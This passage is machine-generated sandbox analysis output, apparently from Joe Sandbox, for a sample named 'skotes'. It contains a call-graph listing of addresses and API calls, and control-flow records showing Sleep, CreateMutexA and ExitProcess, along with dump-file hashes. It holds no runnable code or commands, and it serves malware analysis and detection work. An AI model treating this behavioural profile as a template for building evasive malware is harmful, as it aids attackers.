be3c5f 11383->11386 11384 be3c68 11385->11386 11386->11384 11387 be3810 4 API calls 11386->11387 11388 be3cdb 11387->11388 11397 be3840 11401 be385f 11397->11401 11405 be38f6 11397->11405 11398 be3920 11407 bf91e0 11398->11407 11400 be3925 11401->11398 11403 be38cd shared_ptr 11401->11403 11404 be391b 11401->11404 11401->11405 11402 bf7d50 RtlAllocateHeap 11402->11405 11403->11402 11406 c16c6a RtlAllocateHeap 11404->11406 11406->11398 11408 bfc1b9 RtlAllocateHeap 11407->11408 11409 bf91ea 11408->11409 11409->11400 11410 be3440 11415 be2b30 11410->11415 11412 be344f Concurrency::cancel_current_task 11413 c138af ___std_exception_copy RtlAllocateHeap 11412->11413 11414 be3483 11413->11414 11416 c138af ___std_exception_copy RtlAllocateHeap 11415->11416 11417 be2b68 std::invalid_argument::invalid_argument 11416->11417 11417->11412 11453 be6db5 11454 be6dc2 11453->11454 11455 be6dca 11454->11455 11456 be6df5 11454->11456 11457 bf80c0 RtlAllocateHeap 11455->11457 11458 bf80c0 RtlAllocateHeap 11456->11458 11459 be6deb shared_ptr 11457->11459 11458->11459 11460 be6ec1 shared_ptr 11459->11460 11461 c16c6a RtlAllocateHeap 11459->11461 11462 be6ee3 11461->11462 11467 beb7b1 11468 beb7be 11467->11468 11469 bf7a00 RtlAllocateHeap 11468->11469 11470 beb7f3 11469->11470 11471 bf7a00 RtlAllocateHeap 11470->11471 11472 beb80b 11471->11472 11473 bf7a00 RtlAllocateHeap 11472->11473 11474 beb823 11473->11474 11475 bf7a00 RtlAllocateHeap 11474->11475 11476 beb835 11475->11476 11486 be9ba5 11487 be9ba7 11486->11487 11488 bf7a00 RtlAllocateHeap 11487->11488 11489 be9ca9 11488->11489 11490 be5c10 4 API calls 11489->11490 11491 be9cb1 11490->11491 11492 be8b30 4 API calls 11491->11492 11493 be9cc2 11492->11493 11494 bf8220 RtlAllocateHeap 11493->11494 11495 be9cd1 11494->11495 11536 be3f9f 11537 be3fad 11536->11537 11538 be3fc5 11536->11538 11539 be2410 5 API calls 11537->11539 11540 be3fb6 11539->11540 11541 be3ce0 RtlAllocateHeap 11540->11541 11541->11538 11545 be2b90 11546 be2bce 11545->11546 11549 bfb7fb 11546->11549 11548 be2bdb shared_ptr std::invalid_argument::invalid_argument 11550 bfb817 11549->11550 11551 bfb807 11549->11551 11550->11548 11551->11550 11553 bfca78 11551->11553 11554 bfca8d TpReleaseWork 11553->11554 11554->11550 11568 be8980 11569 be8aea 11568->11569 11576 be89d8 shared_ptr 11568->11576 11570 bf7a00 RtlAllocateHeap 11570->11576 11571 be5c10 4 API calls 11571->11576 11572 be8b20 11574 bf8200 RtlAllocateHeap 11572->11574 11573 bf80c0 RtlAllocateHeap 11573->11576 11575 be8b25 11574->11575 11577 c16c6a RtlAllocateHeap 11575->11577 11576->11569 11576->11570 11576->11571 11576->11572 11576->11573 11576->11575 11578 be8b2a 11577->11578 11609 be43f0 11610 bfbedf InitOnceExecuteOnce 11609->11610 11611 be440a 11610->11611 11612 be4411 11611->11612 11613 c16cbb 4 API calls 11611->11613 11614 be4424 11613->11614 11615 be55f0 11616 be5610 11615->11616 11617 be22c0 4 API calls 11616->11617 11618 be5710 std::invalid_argument::invalid_argument 11616->11618 11617->11616 11659 be3fe0 11660 be4022 11659->11660 11661 be408c 11660->11661 11662 be40d2 11660->11662 11665 be4035 std::invalid_argument::invalid_argument 11660->11665 11666 be35e0 11661->11666 11673 be3ee0 11662->11673 11667 bfd3e2 RtlAllocateHeap 11666->11667 11668 be3616 11667->11668 11671 be364e Concurrency::cancel_current_task shared_ptr std::invalid_argument::invalid_argument 11668->11671 11679 be2ce0 11668->11679 11670 be369e 11670->11671 11688 be2c00 11670->11688 11671->11665 11674 be3f48 11673->11674 11675 be3f1e 11673->11675 11676 be2c00 4 API calls 11674->11676 11677 be3f58 11674->11677 11675->11665 11678 be3f7f 11676->11678 11677->11665 11678->11665 11680 be2d1d 11679->11680 11681 bfbedf InitOnceExecuteOnce 11680->11681 11682 be2d46 11681->11682 11683 be2d51 std::invalid_argument::invalid_argument 11682->11683 11684 be2d88 11682->11684 11698 bfbef7 11682->11698 11683->11670 11686 be2440 4 API calls 11684->11686 11687 be2d9b 11686->11687 11687->11670 11689 bfd3e2 RtlAllocateHeap 11688->11689 11690 be2c0e 11689->11690 11723 bfb847 11690->11723 11692 be2c42 11693 be2c49 11692->11693 11729 be2c80 11692->11729 11693->11671 11695 be2c58 11732 be2560 11695->11732 11697 be2c65 Concurrency::cancel_current_task 11699 bfbf03 11698->11699 11707 be2900 11699->11707 11701 bfbf23 Concurrency::cancel_current_task 11702 bfbf6a 11701->11702 11703 bfbf73 11701->11703 11717 bfbe7f 11702->11717 11705 be2ae0 5 API calls 11703->11705 11706 bfbf6f 11705->11706 11706->11684 11708 bf80c0 RtlAllocateHeap 11707->11708 11709 be294f 11708->11709 11710 be26b0 RtlAllocateHeap 11709->11710 11711 be2967 11710->11711 11712 be298d shared_ptr 11711->11712 11713 c16c6a RtlAllocateHeap 11711->11713 11712->11701 11714 be29b6 11713->11714 11715 c138af ___std_exception_copy RtlAllocateHeap 11714->11715 11716 be29e4 11715->11716 11716->11701 11718 bfcc31 InitOnceExecuteOnce 11717->11718 11719 bfbe97 11718->11719 11720 bfbe9e 11719->11720 11721 c16cbb 4 API calls 11719->11721 11720->11706 11722 bfbea7 11721->11722 11722->11706 11724 bfb854 11723->11724 11728 bfb873 Concurrency::details::_Reschedule_chore 11723->11728 11735 bfcb77 11724->11735 11726 bfb864 11726->11728 11737 bfb81e 11726->11737 11728->11692 11730 bfb7fb TpReleaseWork 11729->11730 11731 be2cb2 shared_ptr 11730->11731 11731->11695 11733 c138af ___std_exception_copy RtlAllocateHeap 11732->11733 11734 be2597 std::invalid_argument::invalid_argument 11733->11734 11734->11697 11736 bfcb92 CreateThreadpoolWork 11735->11736 11736->11726 11738 bfb827 Concurrency::details::_Reschedule_chore 11737->11738 11741 bfcdcc 11738->11741 11740 bfb841 11740->11728 11742 bfcde1 TpPostWork 11741->11742 11742->11740 11743 bf85e0 11744 bf85f6 11743->11744 11744->11744 11745 bf860b 11744->11745 11746 bf8f40 RtlAllocateHeap 11744->11746 11746->11745 11747 bf8de0 11748 bf8f2f 11747->11748 11749 bf8e05 11747->11749 11750 bf9270 RtlAllocateHeap 11748->11750 11753 bf8e4c 11749->11753 11754 bf8e76 11749->11754 11751 bf8f34 11750->11751 11752 be2480 RtlAllocateHeap 11751->11752 11759 bf8e5d __cftof 11752->11759 11753->11751 11755 bf8e57 11753->11755 11756 bfd3e2 RtlAllocateHeap 11754->11756 11754->11759 11758 bfd3e2 RtlAllocateHeap 11755->11758 11756->11759 11757 c16c6a RtlAllocateHeap 11761 bf8f3e 11757->11761 11758->11759 11759->11757 11760 bf8eed shared_ptr __cftof 11759->11760 11762 be87d0 11763 be88d3 11762->11763 11772 be8819 shared_ptr 11762->11772 11764 bf80c0 RtlAllocateHeap 11763->11764 11770 be8923 11764->11770 11765 be896c 11766 bf8200 RtlAllocateHeap 11765->11766 11769 be8971 11766->11769 11767 be8949 shared_ptr 11768 bf80c0 RtlAllocateHeap 11768->11772 11770->11767 11771 c16c6a RtlAllocateHeap 11770->11771 11771->11765 11772->11763 11772->11765 11772->11768 11772->11770 11773 c167b7 11774 c167c3 __dosmaperr 11773->11774 11775 c167cd 11774->11775 11779 c167e2 11774->11779 11776 c175f6 __dosmaperr RtlAllocateHeap 11775->11776 11777 c167d2 11776->11777 11778 c16c5a ___std_exception_copy RtlAllocateHeap 11777->11778 11781 c167dd 11778->11781 11779->11781 11782 c16740 11779->11782 11783 c16762 11782->11783 11784 c1674d 11782->11784 11790 c1675d 11783->11790 11798 c1a038 11783->11798 11785 c175f6 __dosmaperr RtlAllocateHeap 11784->11785 11786 c16752 11785->11786 11788 c16c5a ___std_exception_copy RtlAllocateHeap 11786->11788 11788->11790 11790->11781 11794 c16785 11815 c1aebb 11794->11815 11797 c1adf5 __freea RtlAllocateHeap 11797->11790 11799 c1a050 11798->11799 11803 c16777 11798->11803 11800 c1afe4 RtlAllocateHeap 11799->11800 11799->11803 11801 c1a06e 11800->11801 11830 c20439 11801->11830 11804 c1b00b 11803->11804 11805 c1677f 11804->11805 11806 c1b022 11804->11806 11808 c1afe4 11805->11808 11806->11805 11807 c1adf5 __freea RtlAllocateHeap 11806->11807 11807->11805 11809 c1aff0 11808->11809 11810 c1b005 11808->11810 11811 c175f6 __dosmaperr RtlAllocateHeap 11809->11811 11810->11794 11812 c1aff5 11811->11812 11813 c16c5a ___std_exception_copy RtlAllocateHeap 11812->11813 11814 c1b000 11813->11814 11814->11794 11816 c1aee1 11815->11816 11817 c1aecc 11815->11817 11819 c1af2a 11816->11819 11822 c1af08 11816->11822 11818 c175e3 __dosmaperr RtlAllocateHeap 11817->11818 11821 c1aed1 11818->11821 11820 c175e3 __dosmaperr RtlAllocateHeap 11819->11820 11823 c1af2f 11820->11823 11824 c175f6 __dosmaperr RtlAllocateHeap 11821->11824 11848 c1ae2f 11822->11848 11826 c175f6 __dosmaperr RtlAllocateHeap 11823->11826 11827 c1678b 11824->11827 11828 c1af37 11826->11828 11827->11790 11827->11797 11829 c16c5a ___std_exception_copy RtlAllocateHeap 11828->11829 11829->11827 11831 c20445 __dosmaperr 11830->11831 11832 c20465 11831->11832 11833 c2044d 11831->11833 11834 c20500 11832->11834 11844 c20497 11832->11844 11835 c175e3 __dosmaperr RtlAllocateHeap 11833->11835 11836 c175e3 __dosmaperr RtlAllocateHeap 11834->11836 11837 c20452 11835->11837 11838 c20505 11836->11838 11839 c175f6 __dosmaperr RtlAllocateHeap 11837->11839 11840 c175f6 __dosmaperr RtlAllocateHeap 11838->11840 11841 c2045a 11839->11841 11842 c2050d 11840->11842 11841->11803 11843 c16c5a ___std_exception_copy RtlAllocateHeap 11842->11843 11843->11841 11844->11841 11845 c175f6 __dosmaperr RtlAllocateHeap 11844->11845 11846 c204be 11845->11846 11847 c175e3 __dosmaperr RtlAllocateHeap 11846->11847 11847->11841 11849 c1ae3b __dosmaperr 11848->11849 11850 c1ae70 11849->11850 11851 c1ae7b 11849->11851 11855 c1af48 11850->11855 11853 c175f6 __dosmaperr RtlAllocateHeap 11851->11853 11854 c1ae76 11853->11854 11854->11827 11866 c1c0de 11855->11866 11857 c1af90 11859 c1af5e 11857->11859 11861 c1c0de RtlAllocateHeap 11857->11861 11858 c1af58 11858->11857 11858->11859 11860 c1c0de RtlAllocateHeap 11858->11860 11862 c1afd8 11859->11862 11864 c175c0 __dosmaperr RtlAllocateHeap 11859->11864 11863 c1af87 11860->11863 11861->11859 11862->11854 11865 c1c0de RtlAllocateHeap 11863->11865 11864->11862 11865->11857 11867 c1c100 11866->11867 11868 c1c0eb 11866->11868 11871 c175e3 __dosmaperr RtlAllocateHeap 11867->11871 11874 c1c125 11867->11874 11869 c175e3 __dosmaperr RtlAllocateHeap 11868->11869 11870 c1c0f0 11869->11870 11873 c175f6 __dosmaperr RtlAllocateHeap 11870->11873 11872 c1c130 11871->11872 11875 c175f6 __dosmaperr RtlAllocateHeap 11872->11875 11876 c1c0f8 11873->11876 11874->11858 11877 c1c138 11875->11877 11876->11858 11878 c16c5a ___std_exception_copy RtlAllocateHeap 11877->11878 11878->11876 11888 be21c0 11889 be21cb 11888->11889 11890 be21d0 11888->11890 11891 be21d4 11890->11891 11894 be21ec __cftof 11890->11894 11892 c175f6 __dosmaperr RtlAllocateHeap 11891->11892 11893 be21d9 11892->11893 11895 c16c5a ___std_exception_copy RtlAllocateHeap 11893->11895 11896 be21fc __cftof 11894->11896 11897 be223a 11894->11897 11898 be2221 11894->11898 11899 be21e4 11895->11899 11901 be2231 11897->11901 11903 c175f6 __dosmaperr RtlAllocateHeap 11897->11903 11900 c175f6 __dosmaperr RtlAllocateHeap 11898->11900 11902 be2226 11900->11902 11904 c16c5a ___std_exception_copy RtlAllocateHeap 11902->11904 11905 be2247 11903->11905 11904->11901 11906 c16c5a ___std_exception_copy RtlAllocateHeap 11905->11906 11907 be2252 11906->11907 11946 bf79c0 11947 bf79e0 11946->11947 11947->11947 11948 bf80c0 RtlAllocateHeap 11947->11948 11949 bf79f2 11948->11949 11950 c18bbe 11953 c18868 11950->11953 11954 c1868d RtlAllocateHeap 11953->11954 11956 c1887a 11954->11956 11955 c188b3 11958 c1690a __cftof 4 API calls 11955->11958 11956->11955 11957 c1888f 11956->11957 11970 c1889f 11956->11970 11959 c175f6 __dosmaperr RtlAllocateHeap 11957->11959 11963 c188bf 11958->11963 11960 c18894 11959->11960 11962 c16c5a ___std_exception_copy RtlAllocateHeap 11960->11962 11961 c16d52 4 API calls 11961->11963 11962->11970 11963->11961 11964 c188ee 11963->11964 11967 c18958 11964->11967 11971 c18a8d 11964->11971 11965 c18a8d RtlAllocateHeap 11968 c18a20 11965->11968 11967->11965 11969 c175f6 __dosmaperr RtlAllocateHeap 11968->11969 11968->11970 11969->11970 11972 c18ab2 11971->11972 11973 c18a9e 11971->11973 11972->11967 11973->11972 11974 c175f6 __dosmaperr RtlAllocateHeap 11973->11974 11975 c18aa7 11974->11975 11976 c16c5a ___std_exception_copy RtlAllocateHeap 11975->11976 11976->11972 11977 bf83c0 11978 bf7760 RtlAllocateHeap 11977->11978 11979 bf8439 11978->11979 11980 bf8f40 RtlAllocateHeap 11979->11980 11981 bf8454 11979->11981 11980->11981 11982 bf8f40 RtlAllocateHeap 11981->11982 11984 bf84a8 11981->11984 11983 bf84ee 11982->11983 11990 be6535 11992 be6549 shared_ptr 11990->11992 11991 c16c6a RtlAllocateHeap 11994 be65dc 11991->11994 11992->11991 11993 be65b1 shared_ptr std::invalid_argument::invalid_argument 11992->11993 11995 bf7a00 RtlAllocateHeap 11994->11995 11996 be66a6 11995->11996 11997 be5c10 4 API calls 11996->11997 11998 be66ac 11997->11998 11999 be5c10 4 API calls 11998->11999 12000 be66b1 11999->12000 12001 be22c0 4 API calls 12000->12001 12002 be66c9 shared_ptr 12001->12002 12003 bf7a00 RtlAllocateHeap 12002->12003 12004 be6732 12003->12004 12005 be5c10 4 API calls 12004->12005 12006 be673d 12005->12006 12007 be22c0 4 API calls 12006->12007 12008 be6757 shared_ptr 12007->12008 12009 be6852 12008->12009 12011 bf7a00 RtlAllocateHeap 12008->12011 12014 be5c10 4 API calls 12008->12014 12016 be22c0 4 API calls 12008->12016 12010 bf80c0 RtlAllocateHeap 12009->12010 12012 be689c 12010->12012 12011->12008 12013 bf80c0 RtlAllocateHeap 12012->12013 12015 be68e3 shared_ptr std::invalid_argument::invalid_argument 12013->12015 12014->12008 12016->12008 12025 be4120 12026 be416a 12025->12026 12027 be3ee0 4 API calls 12026->12027 12028 be41b2 std::invalid_argument::invalid_argument 12026->12028 12027->12028 12064 bf8320 12065 bf8339 12064->12065 12066 bf834d 12065->12066 12067 bf8f40 RtlAllocateHeap 12065->12067 12067->12066 12068 be211c 12069 be2126 12068->12069 12070 bfd64e RtlAllocateHeap 12069->12070 12071 be2132 12070->12071 12072 bfd111 12074 bfd122 12072->12074 12073 bfd12a 12074->12073 12076 bfd199 12074->12076 12077 bfd1a7 SleepConditionVariableCS 12076->12077 12079 bfd1c0 12076->12079 12077->12079 12079->12074 12083 be2b10 12084 be2b1c 12083->12084 12085 be2b1a 12083->12085 12086 bfc26a 5 API calls 12084->12086 12087 be2b22 12086->12087 12088 bf8510 12089 bf855f 12088->12089 12092 bf856c 12088->12092 12094 bf9d00 12089->12094 12090 bf85c4 12092->12090 12115 bfa060 12092->12115 12095 bf9e31 12094->12095 12099 bf9d25 12094->12099 12096 bf9270 RtlAllocateHeap 12095->12096 12107 bf9d8b __cftof 12096->12107 12097 c16c6a RtlAllocateHeap 12106 bf9e3b 12097->12106 12098 bf9e2c 12102 be2480 RtlAllocateHeap 12098->12102 12099->12098 12100 bf9d7a 12099->12100 12101 bf9da1 12099->12101 12100->12098 12103 bf9d85 12100->12103 12105 bfd3e2 RtlAllocateHeap 12101->12105 12101->12107 12102->12095 12104 bfd3e2 RtlAllocateHeap 12103->12104 12104->12107 12105->12107 12108 bf9e6a shared_ptr 12106->12108 12109 c16c6a RtlAllocateHeap 12106->12109 12107->12097 12110 bf9dfc shared_ptr __cftof 12107->12110 12108->12092 12111 bf9e8e 12109->12111 12110->12092 12112 bf9ec0 shared_ptr 12111->12112 12113 c16c6a RtlAllocateHeap 12111->12113 12112->12092 12114 bf9ee6 12113->12114 12116 bfa1b1 12115->12116 12118 bfa083 12115->12118 12117 bf9270 RtlAllocateHeap 12116->12117 12128 bfa0e4 __cftof 12117->12128 12119 bfa1ac 12118->12119 12121 bfa0fd 12118->12121 12122 bfa0d3 12118->12122 12123 be2480 RtlAllocateHeap 12119->12123 12120 c16c6a RtlAllocateHeap 12127 bfa1bb shared_ptr 12120->12127 12126 bfd3e2 RtlAllocateHeap 12121->12126 12121->12128 12122->12119 12124 bfa0de 12122->12124 12123->12116 12125 bfd3e2 RtlAllocateHeap 12124->12125 12125->12128 12126->12128 12127->12092 12128->12120 12129 bfa16c shared_ptr __cftof 12128->12129 12129->12092 12178 be5f76 12180 be5f81 shared_ptr 12178->12180 12179 be5ffe shared_ptr std::invalid_argument::invalid_argument 12180->12179 12181 c16c6a RtlAllocateHeap 12180->12181 12182 be601b 12181->12182 12183 bf80c0 RtlAllocateHeap 12182->12183 12184 be6089 12183->12184 12185 bf80c0 RtlAllocateHeap 12184->12185 12186 be60bd 12185->12186 12187 bf80c0 RtlAllocateHeap 12186->12187 12188 be60ee 12187->12188 12189 bf80c0 RtlAllocateHeap 12188->12189 12190 be611f 12189->12190 12191 bf80c0 RtlAllocateHeap 12190->12191 12193 be6150 12191->12193 12192 be65b1 shared_ptr std::invalid_argument::invalid_argument 12193->12192 12194 c16c6a RtlAllocateHeap 12193->12194 12195 be65dc 12194->12195 12196 bf7a00 RtlAllocateHeap 12195->12196 12197 be66a6 12196->12197 12198 be5c10 4 API calls 12197->12198 12199 be66ac 12198->12199 12200 be5c10 4 API calls 12199->12200 12201 be66b1 12200->12201 12202 be22c0 4 API calls 12201->12202 12203 be66c9 shared_ptr 12202->12203 12204 bf7a00 RtlAllocateHeap 12203->12204 12205 be6732 12204->12205 12206 be5c10 4 API calls 12205->12206 12207 be673d 12206->12207 12208 be22c0 4 API calls 12207->12208 12217 be6757 shared_ptr 12208->12217 12209 be6852 12210 bf80c0 RtlAllocateHeap 12209->12210 12212 be689c 12210->12212 12211 bf7a00 RtlAllocateHeap 12211->12217 12213 bf80c0 RtlAllocateHeap 12212->12213 12215 be68e3 shared_ptr std::invalid_argument::invalid_argument 12213->12215 12214 be5c10 4 API calls 12214->12217 12216 be22c0 4 API calls 12216->12217 12217->12209 12217->12211 12217->12214 12217->12216 12218 be2170 12223 bfc6fc 12218->12223 12221 bfd64e RtlAllocateHeap 12222 be2184 12221->12222 12224 bfc70c 12223->12224 12225 be217a 12223->12225 12224->12225 12227 bfcfbe 12224->12227 12225->12221 12228 bfccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12227->12228 12229 bfcfd0 12228->12229 12229->12224 12230 be3970 12231 bfc68b __Mtx_init_in_situ 2 API calls 12230->12231 12232 be39a7 12231->12232 12233 bfc68b __Mtx_init_in_situ 2 API calls 12232->12233 12234 be39e6 12233->12234 12235 be3770 12236 be379b 12235->12236 12237 be37cd shared_ptr 12236->12237 12238 c16c6a RtlAllocateHeap 12236->12238 12239 be380f 12238->12239 12283 be215a 12284 bfc6fc InitializeCriticalSectionEx 12283->12284 12285 be2164 12284->12285 12286 bfd64e RtlAllocateHeap 12285->12286 12287 be216e 12286->12287 12288 c16729 12291 c16672 12288->12291 12290 c1673b 12293 c1667e __dosmaperr 12291->12293 12292 c16685 12294 c175f6 __dosmaperr RtlAllocateHeap 12292->12294 12293->12292 12295 c166a5 12293->12295 12296 c1668a 12294->12296 12298 c166b7 12295->12298 12299 c166aa 12295->12299 12297 c16c5a ___std_exception_copy RtlAllocateHeap 12296->12297 12303 c16695 12297->12303 12305 c1a8c3 12298->12305 12300 c175f6 __dosmaperr RtlAllocateHeap 12299->12300 12300->12303 12302 c166c0 12302->12303 12304 c175f6 __dosmaperr RtlAllocateHeap 12302->12304 12303->12290 12304->12303 12306 c1a8cf __dosmaperr 12305->12306 12309 c1a967 12306->12309 12308 c1a8ea 12308->12302 12313 c1a98a 12309->12313 12310 c1d82f __dosmaperr RtlAllocateHeap 12311 c1a9eb 12310->12311 12312 c1adf5 __freea RtlAllocateHeap 12311->12312 12314 c1a9d0 12312->12314 12313->12310 12313->12314 12314->12308 12327 bea54d 12328 bea555 shared_ptr 12327->12328 12329 bea628 shared_ptr 12328->12329 12330 bea944 12328->12330 12333 bf80c0 RtlAllocateHeap 12329->12333 12331 c16c6a RtlAllocateHeap 12330->12331 12332 bea949 12331->12332 12334 bea94e 12332->12334 12335 c16c6a RtlAllocateHeap 12332->12335 12336 bea903 12333->12336 12337 bea953 Sleep CreateMutexA 12334->12337 12338 c16c6a RtlAllocateHeap 12334->12338 12335->12334 12339 bea98e 12337->12339 12338->12337 12340 be9f44 12342 be9f4c shared_ptr 12340->12342 12341 bea92b 12344 bea953 Sleep CreateMutexA 12341->12344 12345 c16c6a RtlAllocateHeap 12341->12345 12342->12341 12343 bea01f shared_ptr 12342->12343 12346 bf80c0 RtlAllocateHeap 12343->12346 12347 bea98e 12344->12347 12345->12344 12348 bea903 12346->12348

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 367 c1652b-c16538 call c1a302 370 c1655a-c1656c call c1656d ExitProcess 367->370 371 c1653a-c16548 GetPEB 367->371 371->370 373 c1654a-c16559 371->373 373->370
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00C1652A,?,?,?,?,?,00C17661), ref: 00C16567
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: ecf2a667ee3af685b7885973df2d332425683da16dbcb17760b0b69befb09194
                                                          • Instruction ID: 8b87d2647f994476020bc3c76297083fbc6f826e3f4ff0e13c9c105c699948d4
                                                          • Opcode Fuzzy Hash: ecf2a667ee3af685b7885973df2d332425683da16dbcb17760b0b69befb09194
                                                          • Instruction Fuzzy Hash: 60E08630081608EFCE257B58C9499993B1AEF43749F400C04FC188A122CB35EEC1E551

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNELBASE(00000064), ref: 00BEA963
                                                          • CreateMutexA.KERNELBASE(00000000,00000000,00C43254), ref: 00BEA981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
